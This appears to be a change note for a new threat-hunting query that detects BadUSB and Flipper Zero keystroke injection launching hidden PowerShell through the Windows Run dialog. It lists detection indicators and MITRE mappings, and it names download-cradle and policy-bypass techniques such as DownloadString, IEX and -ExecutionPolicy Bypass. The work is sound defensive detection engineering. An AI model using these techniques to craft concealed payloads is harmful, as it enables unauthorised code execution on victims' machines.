BadUSB HID Injection Detection: New Hunt for PowerShell via Windows Run Dialog

What Changed

Added new hunting query to detect BadUSB and hardware HID injection attacks that use the Windows Run dialog (WIN+R) to execute PowerShell with evasion techniques.

Detection Logic

Queries DeviceProcessEvents to identify PowerShell processes with these characteristics:

• Parent process: explorer.exe (indicates GUI-initiated execution via Run dialog)
• Child process: powershell.exe or pwsh.exe
• Required flags: -WindowStyle Hidden (concealment)
• Evasion indicators: Any of 9 common cradle/bypass techniques including:
  • Remote execution: DownloadString, WebClient, IEX
  • Profile bypass: -NoProfile, -NonInteractive
  • Policy bypass: -ExecutionPolicy Bypass

The combination of hidden execution from explorer.exe parent with evasion flags creates high-confidence detection of automated injection rather than legitimate user activity.

Security Impact

Provides visibility into hardware-based initial access attacks including:

• Flipper Zero and Rubber Ducky USB keystroke injection
• BadUSB attacks using WIN+R automation
• Physical access scenarios with automated payload delivery

The query has been validated against real Flipper Zero payloads and includes companion SIGMA rules for broader SIEM coverage.

MITRE Mapping

• T1200 (Hardware Additions) - USB HID injection devices
• T1059.001 (PowerShell) - Script execution post-injection
• T1564.003 (Hidden Window) - Concealment via WindowStyle parameter

Affected Files

Hunting Queries/DeviceProcess/BadUSBPowerShellRunDialog.yaml